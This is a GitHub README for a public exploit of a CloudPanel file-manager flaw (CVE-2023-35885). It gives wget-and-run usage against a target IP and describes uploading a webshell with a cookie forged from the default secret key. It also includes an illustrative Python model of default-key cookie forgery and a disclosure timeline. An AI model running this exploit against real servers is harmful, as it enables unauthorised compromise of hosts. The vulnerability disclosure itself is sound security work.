datackmy/FallingSkies-CVE-2023-35885
CVE-2023-35885

Cloudpanel 0-day Exploit

Authors: @EagleTube, @Mzulfahmy, @farphalabs
GitHub: https://github.com/datackmy/FallingSkies-CVE-2023-35885/blob/main/
Affected versions: v2.0.0 – v2.3.0
Patched version: v2.3.1
Vendor homepage: CloudPanel.io
Product: CloudPanel
References: https://www.datack.my/fallingskies-cloudpanel-0-day/ (write-up)

Usage:

wget https://raw.githubusercontent.com/datackmy/FallingSkies-CVE-2023-35885/main/exploit2.py
chmod +x exploit2.py
python3 exploit2.py -T target_ip:target_port

DISCLAIMER

Use this script for educational purposes only.
We are not responsible for any damage caused by, or abuse of, this script by third parties.

PROOF OF CONCEPT

Upload a webshell by injecting an encrypted, serialized clp-fm cookie forged with the default secret key. Because the key is the same on every unpatched installation, anyone who knows it can mint a cookie the file manager accepts as authenticated.

Shell uploaded by the automated Python script.

SSH user that has already been granted sudo privileges.
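The PoC above hinges on one design flaw: the cookie's only protection is a secret key that every installation shares. The following is an added example written for this README, not CloudPanel's code and not exploit2.py; the cookie layout, claim names and DEFAULT_KEY are invented, and it uses JSON plus HMAC-SHA256 instead of the product's encrypted serialized format. It shows why a cookie forged with the shipped default key is accepted by a server that never rotated that key, and rejected by one whose key was generated randomly at install time.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time


# Hypothetical factory-default secret standing in for whatever a product ships in its
# default configuration. Anyone who has read the install image knows it.
DEFAULT_KEY = b"default-file-manager-secret"


def mint_cookie(claims: dict, key: bytes) -> str:
    """Serialize claims as JSON and append an HMAC-SHA256 tag computed under `key`."""
    body = base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode()).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_cookie(cookie: str, key: bytes):
    """Return the claims if the tag verifies under `key` and the cookie is unexpired, else None."""
    if "." not in cookie:
        return None
    body, tag = cookie.rsplit(".", 1)
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    try:
        # Plain data decoding only: nothing is unserialized into live objects.
        claims = json.loads(base64.urlsafe_b64decode(body))
    except ValueError:  # covers binascii.Error and json.JSONDecodeError
        return None
    if not isinstance(claims, dict) or claims.get("exp", 0) < time.time():
        return None
    return claims


class FileManager:
    """Minimal stand-in for a file-manager upload endpoint that trusts an authenticated cookie."""

    def __init__(self, cookie_key: bytes):
        self.cookie_key = cookie_key

    def upload(self, cookie: str, path: str, content: bytes) -> str:
        claims = verify_cookie(cookie, self.cookie_key)
        if claims is None:
            return "401 rejected"
        return f"200 wrote {len(content)} bytes to {claims['root']}{path}"


def forge_cookie(key: bytes) -> str:
    """What an attacker can mint once the signing key is public knowledge (claims are invented)."""
    return mint_cookie({"user": "attacker", "root": "/home/site/htdocs", "exp": 4102444800}, key)


def demo() -> dict:
    """Same forged cookie against a default-keyed server and a randomly keyed one."""
    shipped_as_is = FileManager(DEFAULT_KEY)          # key never changed after install
    hardened = FileManager(secrets.token_bytes(32))   # fresh random key generated at install
    forged = forge_cookie(DEFAULT_KEY)
    payload = b"constructed upload body"              # placeholder for the uploaded file
    return {
        "default_key": shipped_as_is.upload(forged, "/shell.php", payload),
        "random_key": hardened.upload(forged, "/shell.php", payload),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result}")
```

The check a practitioner wants after patching is that the secret in use is no longer the shipped default; the hardened instance models that by deriving its key from `secrets.token_bytes` at construction time, so the attacker's forged tag no longer verifies and tampering with a legitimately issued cookie fails the constant-time comparison.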

PATCH VERSION

CloudPanel v2.3.1

SPECIAL THANKS & REFERENCE

  1. Datack Sdn Bhd (full writeup) datack.my
  2. Maui sabily.info
  3. Mohamad Zulfahmy (@mzulfahmy)
  4. Farhan Phakhruddin (@farpha)

TIMELINE

01-06-2023 – Exploit found
12-06-2023 – Privately disclosed to vendor
13-06-2023 – Submitted to CVE assigner
19-06-2023 – CVE number assigned by MITRE
20-06-2023 – Patch released by the vendor (v2.3.1)
20-07-2023 – Exploit released to the public
